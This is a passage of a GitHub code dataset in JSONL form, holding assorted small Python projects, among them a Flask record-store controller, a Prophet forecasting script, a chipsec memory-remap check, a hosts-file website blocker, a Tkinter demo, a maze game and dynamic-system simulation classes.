stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price)\n album_repository.save(album)\n return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums/\", methods = [\"GET\"])\ndef show_album(id):\n album = album_repository.select(id)\n return render_template(\"albums/album.html\", album = album)\n\n@albums_blueprint.route(\"/albums//edit\")\ndef edit_album(id):\n album = album_repository.select(id)\n artists = artist_repository.select_all()\n return render_template(\"albums/edit.html\", album = album, artists = artists)\n\n@albums_blueprint.route(\"/albums/\", methods=[\"POST\"])\ndef update_album(id):\n artist = artist_repository.select(request.form[\"artist.id\"])\n title = request.form[\"title\"]\n year_released = request.form[\"year_released\"]\n genre = request.form[\"genre\"]\n stock_qty = int(request.form[\"stock_qty\"])\n purchase_price = float(request.form[\"purchase_price\"])\n sell_price = float(request.form[\"sell_price\"])\n album = Album(artist, title, year_released, genre, stock_qty, purchase_price, sell_price, id)\n album_repository.update(album)\n return redirect(\"/albums\")\n\n@albums_blueprint.route(\"/albums//delete\", methods=[\"POST\"])\ndef delete_album(id):\n album_repository.delete(id)\n return redirect (\"/albums\")\n","repo_name":"LaurenLingham/record_store","sub_path":"controllers/album_controller.py","file_name":"album_controller.py","file_ext":"py","file_size_in_byte":2878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"2179231150","text":"import bingo_add\npeople=100\nsum=0\nfor i in range(1000):\n\tsum+=bingo_add.bingo(people)\n\nstring_num=str((sum/1000.0))\n\nprint (\"Meso oros arithmon mexri to BINGO :\")+string_num\n\n","repo_name":"milosmatic1513/Python-Projects","sub_path":"bingo_ergasia1/bingo.py","file_name":"bingo.py","file_ext":"py","file_size_in_byte":175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"32440450784","text":"from django.test import TestCase\nimport pytest\nfrom .serializers import ProfileSerializer\nfrom .models import Profile\nimport logging\n\n@pytest.mark.django_db\ndef test_profile_serializer():\n # Create a test profile object\n profile = Profile.objects.create(\n name='John Doe',\n bio='Test bio',\n skills='Test skills',\n work_experience='Test work experience',\n hobbies='Test hobbies'\n )\n\n # Serialize the profile object\n serializer = ProfileSerializer(instance=profile)\n logging.info('This is an serializer ', serializer)\n # Ensure the serialized data matches the expected values\n assert serializer.data['name'] == 'John Doe'\n assert serializer.data['bio'] == 'Test bio'\n assert serializer.data['skills'] == 'Test skills'\n assert serializer.data['work_experience'] == 'Test work experience'\n assert serializer.data['hobbies'] == 'Test hobbies'\n\n","repo_name":"raghulvuedata/djangoPortfolio","sub_path":"portfolio/profiles/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"70388977323","text":"from prettytable import PrettyTable\r\n\r\n#with open(\"C:\\\\Users\\\\USER\\\\error_message.csv\",\"r\")as csvfile:\r\n #csvf=csvfile.readlines()\r\n #lines=csvf[0]\r\n #newline=lines.split(\",\")\r\n #s=PrettyTable([newline[0],newline[1]])\r\n #for r in range(1,len(csvf)):\r\n #rr=csvf[r].split(\",\")\r\n #s.add_row([rr[0],rr[1]])\r\n #html_code=s.get_html_string()\r\n #html_file=open(\"C:\\\\Users\\\\USER\\\\html_script.html\",\"w\")\r\n #html_file=html_file.write(html_code)\r\n\r\n\r\nwith open(\"C:\\\\Users\\\\USER\\\\user_statistics.csv\",\"r\") as usercsv:\r\n us=usercsv.readlines()\r\n line=us[0]\r\n lines=line.split(\",\")\r\n D=PrettyTable([lines[0] ,lines[1] ,lines[2]])\r\n for e in range(1,len(us)):\r\n new=us[e].split(\",\")\r\n D.add_row([new[0],new[1],new[2]])\r\n stats_html_code=D.get_html_string()\r\n stats_file=open(\"C:\\\\Users\\\\USER\\\\user_statistics.html\",\"w\")\r\n stats_file=stats_file.write(stats_html_code)","repo_name":"EmperorDa8/random-scripts","sub_path":"csv to html.py","file_name":"csv to html.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"72191022124","text":"import pandas as pd\nfrom fbprophet import Prophet\nimport numpy as np\nimport pyodbc\nimport os\n\n\ndef forecasting():\n restaurant_id = input('geben sie eine RestaurantID an:')\n name_csv = str(input('geben sie den Namen der Zieldatei an: (z.B. restaurant.csv)'))\n column_date = str(input('Name der Spalte mit dem Datum:'))\n column_product_name = str(input('Name der Spalte mit den Produktnamen:'))\n column_quantity = str(input('Name der Spalte mit der Quantity:'))\n column_sold_products = str(input('Name der Spalte mit der Anzahl der verkauften Produkte:'))\n data_path = \"../data\"\n data = pd.read_csv(os.path.join(data_path, name_csv))\n\n data_ts = data[[column_date, column_product_name, column_quantity, column_sold_products]]\n data_ts = data_ts.dropna()\n\n # change to datetime\n data_ts[column_date] = pd.to_datetime(data_ts[column_date])\n data_ts[column_date] = pd.to_datetime(data_ts[column_date], format='%Y%m%d')\n\n data_grouped = data_ts.groupby([column_product_name])[column_sold_products, column_quantity].sum()\n # data_grouped.tail(100)\n\n # get the top 10 most sold products\n top_ten = data_grouped.sort_values(by=str(column_sold_products), ascending=False).head(10)\n top_ten_list = top_ten.index.tolist()\n\n # connect to Database\n connection_string = (\n 'DRIVER=MySQL ODBC 8.0 ANSI Driver;'\n 'SERVER=localhost;'\n 'DATABASE=restaurant_products;'\n 'UID=root;'\n 'PWD=1234;'\n 'charset=utf8mb4;'\n )\n\n conn = pyodbc.connect(connection_string)\n\n def execute(command):\n cursor = conn.cursor()\n cursor.execute(command)\n cursor.commit()\n\n # inserts the forecasting into the database\n def predict(restaurantID, date, quantity, min_quantity, max_quantity, item):\n command = 'insert into prediction (restaurantId,datum,quantity,max_quantity,min_quantity, product_name) values (\"' + str(\n restaurantID) + '\", \"' + str(date) + '\",' + str(quantity) + ',' + str(min_quantity) + ',' + str(\n max_quantity) + ',\"' + str(item) + '\");'\n # print(command)\n execute(command)\n\n for item in top_ten_list:\n is_item = data_ts[column_product_name] == item\n data_item = data_ts[is_item]\n data_item[column_date] = pd.to_datetime(data_item[column_date].dt.strftime('%Y-%m-%d'))\n data_item_grouped = data_item.groupby([column_date])[column_sold_products].sum()\n date = data_item_grouped.index.tolist()\n df_data_item_grouped = data_item_grouped.to_frame()\n # print(date)\n df_data_item_grouped['Datum'] = date\n # data_item_grouped['Order Date'] = data_item_grouped.index\n df_data_item_grouped.reset_index(drop=True, inplace=True)\n\n df_data_item_grouped.rename(columns={'Datum': 'ds', column_sold_products: 'y'}, inplace=True)\n list = df_data_item_grouped['y']\n df_data_item_grouped.pop('y')\n df_data_item_grouped['y'] = list\n\n m = Prophet()\n m.fit(df_data_item_grouped)\n\n future_week = m.make_future_dataframe(periods=7)\n future_week.tail(7)\n\n forecast_week = m.predict(future_week)\n\n print(forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7))\n\n prediction_seven_days_df = forecast_week[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail(7)\n\n for index, rows in prediction_seven_days_df.iterrows():\n date = rows['ds']\n quantity = rows['yhat']\n min_quantity = rows['yhat_lower']\n max_quantity = rows['yhat_upper']\n\n predict(restaurant_id, date, quantity, max_quantity, min_quantity, item)\n\n\nforecasting()\n","repo_name":"BennerLukas/takeawaste","sub_path":"test/deprecated/forecasting_function.py","file_name":"forecasting_function.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"}
+{"seq_id":"2085557282","text":"from chipsec.module_common import BaseModule, ModuleResult, MTAG_HWCONFIG, MTAG_SMM\nfrom chipsec.defines import BIT32, ALIGNED_1MB\n\n_MODULE_NAME = 'remap'\n\nTAGS = [MTAG_SMM, MTAG_HWCONFIG]\n\n\n_REMAP_ADDR_MASK = 0x7FFFF00000\n_TOLUD_MASK = 0xFFFFF000\n\n\nclass remap(BaseModule):\n\n def __init__(self):\n BaseModule.__init__(self)\n self.rc_res = ModuleResult(0x43aa254, 'https://chipsec.github.io/modules/chipsec.modules.common.remap.html')\n\n def is_supported(self) -> bool:\n if self.cs.is_core():\n rbase_exist = self.cs.is_register_defined('PCI0.0.0_REMAPBASE')\n rlimit_exist = self.cs.is_register_defined('PCI0.0.0_REMAPLIMIT')\n touud_exist = self.cs.is_register_defined('PCI0.0.0_TOUUD')\n tolud_exist = self.cs.is_register_defined('PCI0.0.0_TOLUD')\n tseg_exist = self.cs.is_register_defined('PCI0.0.0_TSEGMB')\n if rbase_exist and rlimit_exist and touud_exist and tolud_exist and tseg_exist:\n return True\n self.logger.log_important('Required register definitions not defined for platform. Skipping module.')\n else:\n self.logger.log_important('Not a Core (client) platform. Skipping module.')\n\n self.rc_res.setStatusBit(self.rc_res.status.NOT_APPLICABLE)\n self.res = self.rc_res.getReturnCode(ModuleResult.NOTAPPLICABLE)\n return False\n\n def is_ibecc_enabled(self) -> bool:\n if self.cs.is_register_defined('IBECC_ACTIVATE'):\n edsr = self.cs.read_register_field('IBECC_ACTIVATE', 'IBECC_EN')\n if edsr == 1:\n return True\n else:\n self.logger.log_verbose('IBECC is not enabled!')\n else:\n self.logger.log_verbose('IBECC is not defined!')\n return False\n\n def check_remap_config(self) -> int:\n is_warning = False\n\n remapbase = self.cs.read_register('PCI0.0.0_REMAPBASE')\n remaplimit = self.cs.read_register('PCI0.0.0_REMAPLIMIT')\n touud = self.cs.read_register('PCI0.0.0_TOUUD')\n tolud = self.cs.read_register('PCI0.0.0_TOLUD')\n tsegmb = self.cs.read_register('PCI0.0.0_TSEGMB')\n self.logger.log(\"[*] Registers:\")\n self.logger.log(f\"[*] TOUUD : 0x{touud:016X}\")\n self.logger.log(f\"[*] REMAPLIMIT: 0x{remaplimit:016X}\")\n self.logger.log(f\"[*] REMAPBASE : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] TOLUD : 0x{tolud:08X}\")\n self.logger.log(f\"[*] TSEGMB : 0x{tsegmb:08X}\")\n self.logger.log(\"\")\n\n ia_untrusted = 0\n if self.cs.register_has_field('MSR_BIOS_DONE', 'IA_UNTRUSTED'):\n ia_untrusted = self.cs.read_register_field('MSR_BIOS_DONE', 'IA_UNTRUSTED')\n remapbase_lock = remapbase & 0x1\n remaplimit_lock = remaplimit & 0x1\n touud_lock = touud & 0x1\n tolud_lock = tolud & 0x1\n remapbase &= _REMAP_ADDR_MASK\n remaplimit &= _REMAP_ADDR_MASK\n touud &= _REMAP_ADDR_MASK\n tolud &= _TOLUD_MASK\n tsegmb &= _TOLUD_MASK\n self.logger.log(\"[*] Memory Map:\")\n self.logger.log(f\"[*] Top Of Upper Memory: 0x{touud:016X}\")\n self.logger.log(f\"[*] Remap Limit Address: 0x{(remaplimit | 0xFFFFF):016X}\")\n self.logger.log(f\"[*] Remap Base Address : 0x{remapbase:016X}\")\n self.logger.log(f\"[*] 4GB : 0x{BIT32:016X}\")\n self.logger.log(f\"[*] Top Of Low Memory : 0x{tolud:016X}\")\n self.logger.log(f\"[*] TSEG (SMRAM) Base : 0x{tsegmb:016X}\")\n self.logger.log('')\n\n remap_ok = True\n\n self.logger.log(\"[*] Checking memory remap configuration..\")\n\n if remapbase == remaplimit:\n self.logger.log(\"[!] Memory Remap status is Unknown\")\n is_warning = True\n elif remapbase > remaplimit:\n self.logger.log(\"[*] Memory Remap is disabled\")\n else:\n self.logger.log(\"[*] Memory Remap is enabled\")\n remaplimit_addr = (remaplimit | 0xFFFFF)\n if self.is_ibecc_enabled():\n ok = (remaplimit_addr > touud) and (remapbase < touud)\n else:\n ok = ((remaplimit_addr + 1) == touud)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" Remap window configuration is correct: REMAPBASE <= REMAPLIMIT < TOUUD\")\n else:\n self.logger.log_bad(\" Remap window configuration is not correct\")\n\n ok = (0 == tolud & ALIGNED_1MB) and \\\n (0 == touud & ALIGNED_1MB) and \\\n (0 == remapbase & ALIGNED_1MB) and \\\n (0 == remaplimit & ALIGNED_1MB)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" All addresses are 1MB aligned\")\n else:\n self.logger.log_bad(\" Not all addresses are 1MB aligned\")\n\n self.logger.log(\"[*] Checking if memory remap configuration is locked..\")\n ok = (0 != touud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOUUD is locked\")\n else:\n self.logger.log_bad(\" TOUUD is not locked\")\n\n ok = (0 != tolud_lock) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" TOLUD is locked\")\n else:\n self.logger.log_bad(\" TOLUD is not locked\")\n\n ok = ((0 != remapbase_lock) and (0 != remaplimit_lock)) or (0 != ia_untrusted)\n remap_ok = remap_ok and ok\n if ok:\n self.logger.log_good(\" REMAPBASE and REMAPLIMIT are locked\")\n else:\n self.logger.log_bad(\" REMAPBASE and REMAPLIMIT are not locked\")\n\n if remap_ok:\n if is_warning:\n self.logger.log_warning(\"Most Memory Remap registers are configured correctly and locked\")\n self.logger.log(\"[!] Manual verification of REMAP BASE and LIMIT register values may be needed.\")\n res = ModuleResult.WARNING\n self.rc_res.setStatusBit(self.rc_res.status.VERIFY)\n else:\n res = ModuleResult.PASSED\n self.rc_res.setStatusBit(self.rc_res.status.SUCCESS)\n self.logger.log_passed(\"Memory Remap is configured correctly and locked\")\n else:\n res = ModuleResult.FAILED\n self.rc_res.setStatusBit(self.rc_res.status.CONFIGURATION)\n self.rc_res.setStatusBit(self.rc_res.status.LOCKS)\n self.logger.log_failed(\"Memory Remap is not properly configured/locked. Remaping attack may be possible\")\n\n return self.rc_res.getReturnCode(res)\n\n\n # --------------------------------------------------------------------------\n # run( module_argv )\n # Required function: run here all tests from this module\n # --------------------------------------------------------------------------\n def run(self, _) -> int:\n self.logger.start_test(\"Memory Remapping Configuration\")\n\n self.res = self.check_remap_config()\n return self.res\n","repo_name":"chipsec/chipsec","sub_path":"chipsec/modules/common/remap.py","file_name":"remap.py","file_ext":"py","file_size_in_byte":7083,"program_lang":"python","lang":"en","doc_type":"code","stars":2755,"dataset":"github-code","pt":"19"}
+{"seq_id":"43580235744","text":"class BitmapFile:\n def __init__(self, data):\n self.size = self.sumBytes(data[2:6])\n self.start = self.sumBytes(data[10:14])\n self.width = self.sumBytes(data[18:22])\n self.height = self.sumBytes(data[22:26])\n self.depth = self.sumBytes(data[28:30])\n self.bpp = self.depth // 8\n #self.head = data[0:self.start]\n #self.data = data[self.start:self.size]\n self.data = data\n\n def sumBytes(self, d):\n byteSum = 0\n for i in range(len(d)):\n byteSum += (\n (d[i] % 16) * 16**(i*2) +\n (d[i] // 16) * 16**(i*2 + 1)\n )\n return byteSum\n\n def makeFile(self, filePath):\n with open(filePath, \"wb\") as f:\n f.write(self.data)\n\n def findPixelIndex(self, x, y):\n return self.start + x * self.bpp + y * self.width * self.bpp\n","repo_name":"borkess/afis","sub_path":"BitmapFile.py","file_name":"BitmapFile.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31300617090","text":"import time\nfrom datetime import datetime as dt\n\nhosts_path = r\"C:\\Users\\Vishnu's World\\Desktop\\app3\\hosts\"\nredirect = \"127.0.0.1\"\nwebsite_list = [\"www.facebook.com\",\"facebook.com\",\"www.flipkart.com\",\"www.amazon.in\"]\n\nwhile True:\n if dt(dt.now().year,dt.now().month,dt.now().day,9)>dt.now()>=dt(dt.now().year,dt.now().month,dt.now().day,3):\n print (\"College...\")\n with open(hosts_path,'r+')as file:\n content = file.read()\n for website in website_list:\n if website in content:\n pass\n else:\n file.write(redirect+\"\"+website)\n else:\n with open(hosts_path,'r+') as file:\n content = file.readlines()\n file.seek(0)\n for line in content:\n if not any(website in content for website in website_list):\n file.write(line)\n file.truncate()\n print (\"study...\")\n time.sleep (5)\n","repo_name":"vishnuvryeruva/Website-Blocker","sub_path":"Website_blocker.pyw","file_name":"Website_blocker.pyw","file_ext":"pyw","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"2485307424","text":"import time\nimport matplotlib.pyplot as plt\nfrom typing import Callable\n\nfrom myio import getRandomMatrix\n\n\ndef benchmark(mul_func: Callable, sizes: list) -> list:\n res_times = []\n temp_times = []\n const_measures = 2\n\n for i in range(len(sizes)):\n left_matrix = getRandomMatrix(sizes[i], sizes[i])\n right_matrix = getRandomMatrix(sizes[i], sizes[i])\n for j in range(const_measures):\n start_time = time.time()\n mul_func(left_matrix, right_matrix)\n end_time = time.time() - start_time\n\n temp_times.append(end_time)\n\n res_times.append(sum(temp_times) / const_measures)\n temp_times.clear()\n\n print(res_times)\n\n return res_times\n\n\ndef plot_graph(mul_funcs: list, sizes: list) -> None:\n # General settings\n plt.title(\"Сложность алгоритмов умножения матриц\")\n plt.xlabel(\"Размер\")\n plt.ylabel(\"Время, сек\")\n plt.grid()\n\n # Collecting values\n for mul_func in mul_funcs:\n times = benchmark(mul_func, sizes)\n mul_name = str(mul_func).split()[1]\n if mul_name == \"defaultMatrixMul\":\n mul_name = \"Простой\"\n elif mul_name == \"vinMatrixMul\":\n mul_name = \"Виноград\"\n elif mul_name == \"optimizedVinMatrixMul\":\n mul_name = \"Виноград с оптимизациями\"\n plt.plot(sizes, times, label=mul_name)\n\n # Image of the results obtained\n plt.legend()\n plt.show()","repo_name":"Untouchabl3Pineapple/iu7-aa","sub_path":"lab_02/src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"73023939244","text":"#!/usr/bin/env/python\n# -*- coding: utf-8 -*-\n\nfrom Tkinter import * #importa a bibioteca do TKinter\n\ndef donothing():\n print ('IT WORKED')\n\nroot = Tk() #cria a aplicação raiz. \nroot.title(string=\"..:: CALCULADORA ::..\")\n\nframe1 = Frame(root)\n#frame1.pack(side=TOP, fill=X)\nframe1.grid()\n\nframe2 = Frame(root)\n#frame2.pack(side=RIGHT, fill=X)\nframe2.grid()\nmainmenu = Menu(frame1)\nroot.config(menu=mainmenu)\n\nsubmenu=Menu(mainmenu)\nmainmenu.add_cascade(label='File',menu=submenu)\nsubmenu.add_command(label='Open', command=donothing)\nsubmenu.add_separator()\nsubmenu.add_command(label='Exit', command=frame1.quit)\n\n\nw = Label(frame1, text=\"Teste TKinter!\") #cria um label com o texto especificado\n#w.pack()\nw.grid(column=0,row=0) #insere na tela\nbtn = Button(frame1, text=\"Olá\", cursor=\"hand2\")\n#btn.pack()\nbtn.grid(column=0,row=1)\nbtn2 = Button(frame2, text=\"Hello\", cursor=\"umbrella\")\n#btn2.pack()\nbtn2.grid(column=0,row=0)\nbtn3 = Button(frame2, text=\"Hallo\", cursor=\"sailboat\")\n#btn3.pack()\nbtn3.grid(column=1,row=0)\n#from Tkinter import ttk\n#ttk.Button(root, text=\"Hello World\").grid() #Cria botão\nroot.mainloop() #inicializa o loop","repo_name":"brunocozendey/100DaysChallenge","sub_path":"python/tkinter-teste.py","file_name":"tkinter-teste.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"37196489068","text":"#! /usr/bin/env python3\r\n# coding: utf-8\r\n\r\n\"\"\"This script starts mc Guyver labyrinth\r\nparameter is :\r\n file_name (discribing map).\"\"\"\r\nfrom core.gamemanager import DisplayManager\r\nfrom core.mapgame import MapGame\r\nfrom core import utils\r\nfrom core import constant\r\nfrom tkinter import messagebox, Tk\r\nimport logging as lg\r\n\r\nlogger = lg.getLogger(__name__)\r\n\r\nMODULE_DAL_PATH = 'core/dal'\r\n\r\n\r\ndef main():\r\n \"\"\"Main entry no parameter.\"\"\"\r\n args = utils.parse_arguments()\r\n # prepare les logs\r\n utils.set_logger()\r\n # lit le fichier map\r\n map_game = MapGame(args.datafile)\r\n lg.info('Map description loaded: %s', map_game.path_name)\r\n interface_type = args.interface\r\n lg.info('Display interface : %s', args.interface)\r\n\r\n # implementation Text or Graphic\r\n display = utils.build_display(MODULE_DAL_PATH, interface_type)\r\n\r\n # get Pygame windows\r\n fenetre = display.init(map_game)\r\n lg.info('%s env set : %s', args.interface, map_game.path_name)\r\n\r\n # set display manager : intialize items and persos\r\n game_manager = DisplayManager(display, fenetre, map_game)\r\n\r\n # dispatch item and perso (mcGyver, guard, needle, ether, tube)\r\n game_manager.dispatch_items()\r\n lg.info('Dispatch items set')\r\n\r\n # main loop\r\n continuer = 1\r\n\r\n while continuer:\r\n\r\n game_manager.draw()\r\n\r\n for event in display.event_get():\r\n # Boucle event\r\n if event is None:\r\n continue\r\n\r\n if display.event_quit(event) is True:\r\n continuer = 0\r\n elif display.event_keydown_escape(event) is True:\r\n continuer = 0\r\n elif display.event_keydown_right(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'droite')\r\n elif display.event_keydown_left(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'gauche')\r\n elif display.event_keydown_up(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'haut')\r\n elif display.event_keydown_down(event) is True:\r\n game_manager.move_items(constant.ID_MCGYVER, 'bas')\r\n\r\n # check items\r\n if game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_GARDIEN):\r\n lg.info('On rencontre le garde ')\r\n if game_manager.is_completed():\r\n game_manager.exclude_item(constant.ID_GARDIEN, 4)\r\n lg.info('Ok Garde endormi ')\r\n else:\r\n lg.info('You loose !')\r\n Tk().wm_withdraw()\r\n messagebox.showinfo('Oups', 'You loose !')\r\n continuer = 0\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_AIGUILLE):\r\n lg.info('On rencontre l\\'aiguille ')\r\n game_manager.collect_item(constant.ID_AIGUILLE)\r\n game_manager.exclude_item(constant.ID_AIGUILLE, 0)\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_ETHER):\r\n lg.info('On rencontre la bouteille d\\'ether ')\r\n game_manager.collect_item(constant.ID_ETHER)\r\n game_manager.exclude_item(constant.ID_ETHER, 1)\r\n\r\n elif game_manager.compare_pos(constant.ID_MCGYVER,\r\n constant.ID_TUBE):\r\n lg.info('On rencontre le tube ')\r\n game_manager.collect_item(constant.ID_TUBE)\r\n game_manager.exclude_item(constant.ID_TUBE, 2)\r\n\r\n elif game_manager.is_exit(constant.ID_MCGYVER):\r\n if game_manager.is_completed():\r\n lg.info('You win !')\r\n # on redessine une derniere fois la fenetre du jeu\r\n game_manager.draw()\r\n Tk().wm_withdraw()\r\n messagebox.showinfo('Congratulations', 'You win !')\r\n continuer = 0\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"jean-charles-gibier/macgyver","sub_path":"macgyver.py","file_name":"macgyver.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"38003879286","text":"# python 3\nfrom trees.tree_basics import Node\n\n\ndef build_tree(inorder, postorder, n):\n if not inorder:\n return\n\n root = Node(postorder[-1])\n index = inorder.index(root.data)\n\n new_inorder_left = inorder[:index]\n new_inorder_right = inorder[index + 1:]\n\n new_postorder_left = postorder[:index]\n new_postorder_right = postorder[index:len(postorder) - 1]\n\n root.left = build_tree(new_inorder_left, new_postorder_left, n)\n root.right = build_tree(new_inorder_right, new_postorder_right, n)\n\n return root\n\n\ndef main():\n inorder = [4, 8, 2, 5, 1, 6, 3, 7]\n postorder = [8, 4, 5, 2, 6, 7, 3, 1]\n build_tree(inorder, postorder, len(postorder))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HJ1X/dsa-450","sub_path":"trees/Construct tree/construct_tree_from_in_and_post_order.py","file_name":"construct_tree_from_in_and_post_order.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"25958911853","text":"\"\"\"Test HTTP capabilities of the core's frontend.\"\"\"\n\nfrom ppp_libmodule.tests import PPPTestCase\nfrom ppp_core import app\n\nclass HttpTest(PPPTestCase(app)):\n config_var = 'PPP_CORE_CONFIG'\n config = \"\"\"\n {\n \"debug\": true,\n \"modules\": []\n }\n \"\"\"\n def testPostOnly(self):\n self.assertEqual(self.app.get('/', status='*').status_int, 405)\n self.assertEqual(self.app.put('/', status='*').status_int, 405)\n def testNotRoot(self):\n self.assertEqual(self.app.post_json('/foo', {}, status='*').status_int, 400)\n def testNotJson(self):\n self.assertEqual(self.app.post('/', 'foobar', status='*').status_int, 400)\n def testWorking(self):\n q = {'id': '1', 'language': 'en', 'tree': {'type': 'triple',\n 'subject': {'type': 'resource', 'value': 'foo'},\n 'predicate': {'type': 'resource', 'value': 'bar'},\n 'object': {'type': 'resource', 'value': 'baz'}},\n 'measures': {}, 'trace': []}\n self.assertResponse(q, [])\n def testNoTree(self):\n q = {'language': 'en'}\n self.assertStatusInt(q, 400)\n","repo_name":"ProjetPP/PPP-Core","sub_path":"tests/test_http.py","file_name":"test_http.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"}
+{"seq_id":"673259033","text":"\"\"\"Example dynamic models.\"\"\"\n\nimport abc\nfrom typing import Callable, Tuple\n\nimport numpy as np\nfrom scipy import constants, integrate\n\n\nclass ContinuousDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Continuous-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement differential equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Time derivative of state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t: float, x: np.ndarray) -> np.ndarray:\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: np.ndarray,\n u: Callable[[float], np.ndarray],\n **kwargs,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model using numerical integration.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : Callable[[float], np.ndarray]\n Input function of time.\n **kwargs : dict\n Keyword arguments for :func:`integrate.solve_ivp`.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. Each timestep is one row.\n \"\"\"\n sol = integrate.solve_ivp(\n lambda t, x: self.f(t, x, u(t)),\n t_range,\n x0,\n t_eval=np.arange(*t_range, t_step),\n **kwargs,\n )\n return (sol.t, sol.y.T)\n\n\nclass DiscreteDynamicModel(metaclass=abc.ABCMeta):\n \"\"\"Discrete-time dynamic model.\"\"\"\n\n @abc.abstractmethod\n def f(self, t: float, x: np.ndarray, u: np.ndarray) -> np.ndarray:\n \"\"\"Implement next-state equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n u : np.ndarray\n Input.\n\n Returns\n -------\n np.ndarray\n Next state.\n \"\"\"\n raise NotImplementedError()\n\n def g(self, t, x):\n \"\"\"Implement output equation.\n\n Parameters\n ----------\n t : float\n Time (s).\n x : np.ndarray\n State.\n\n Returns\n -------\n np.ndarray\n Measurement of state.\n \"\"\"\n return x\n\n def simulate(\n self,\n t_range: Tuple[float, float],\n t_step: float,\n x0: np.ndarray,\n u: np.ndarray,\n ) -> Tuple[np.ndarray, np.ndarray]:\n \"\"\"Simulate the model.\n\n Parameters\n ----------\n t_range : Tuple[float, float]\n Start and stop times in a tuple.\n t_step : float\n Timestep of output data.\n x0 : np.ndarray\n Initial condition, shape (n, ).\n u : np.ndarray\n Input array.\n\n Returns\n -------\n Tuple[np.ndarray, np.ndarray]\n Time and state at every timestep. Each timestep is one row.\n \"\"\"\n t = np.arange(*t_range, t_step)\n x = np.empty((t.shape[0], x0.shape[0]))\n x[0, :] = x0\n for k in range(1, t.shape[0]):\n x[k, :] = self.f(t[k - 1], x[k - 1, :], u[k - 1])\n return (t, x)\n\n\nclass MassSpringDamper(ContinuousDynamicModel):\n \"\"\"Mass-spring-damper model.\n\n State is ``[position, velocity]``.\n\n Examples\n --------\n Simulate a mass-spring-damper\n\n >>> msd = pykoop.dynamic_models.MassSpringDamper(0.5, 0.7, 0.6)\n >>> x0 = np.array([1, 0])\n >>> t, x = msd.simulate((0, 1), 1e-3, x0, lambda t: 0)\n \"\"\"\n\n def __init__(self, mass: float, stiffness: float, damping: float) -> None:\n \"\"\"Instantiate :class:`MassSpringDamper`.\n\n Parameters\n ----------\n mass : float\n Mass (kg).\n stiffness : float\n Stiffness (N/m).\n damping : float\n Viscous damping (N.s/m).\n \"\"\"\n self.mass = mass\n self.stiffness = stiffness\n self.damping = damping\n\n @property\n def A(self):\n \"\"\"Compute ``A`` matrix.\"\"\"\n A = np.array([\n [0, 1],\n [-self.stiffness / self.mass, -self.damping / self.mass],\n ])\n return A\n\n @property\n def B(self):\n \"\"\"Compute ``B`` matrix.\"\"\"\n B = np.array([\n 